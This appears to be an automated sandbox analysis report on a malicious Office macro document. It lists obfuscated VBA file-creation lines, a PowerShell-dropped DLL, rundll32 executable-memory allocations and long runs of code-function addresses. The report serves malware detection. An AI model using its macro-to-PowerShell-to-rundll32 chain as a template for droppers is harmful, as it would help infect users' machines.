                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                      Document contains an embedded VBA with base64 encoded stringsShow sources
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5293
                      Source: unknownProcess created: Commandline size = 5197
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5197
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Cgjbbwbf\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000976F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00222C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002302C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002342DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00228736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00227B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00234B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002280BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002260B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002248BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002288E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00221CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002320C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002269A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00236DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002361B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00227998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00226D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002331E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002371EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00222A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00229A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00224A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002262A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00221280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002312E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002326F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002296CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00228F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00225B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00226754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002217AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002373AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002367E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002363C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00229FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00252C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00263895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002602C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002642DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00258736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00257B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00264B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002663C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00254A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00259A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00252A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00267A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00265A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002562A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002548BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002560B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002580BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00251280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002588E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002612E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002626F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00251CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002620C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002596CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00268ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00260D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00267D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00260F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00262B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00267F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00268D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00265D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00260B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00261773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00255B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00258F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00269B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00262349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00268F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00256754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002569A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002517AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002673AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002661B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00266DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00269586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00256D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00257998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00263FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002631E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002671EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002667E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00261BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00259FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001ED7EB
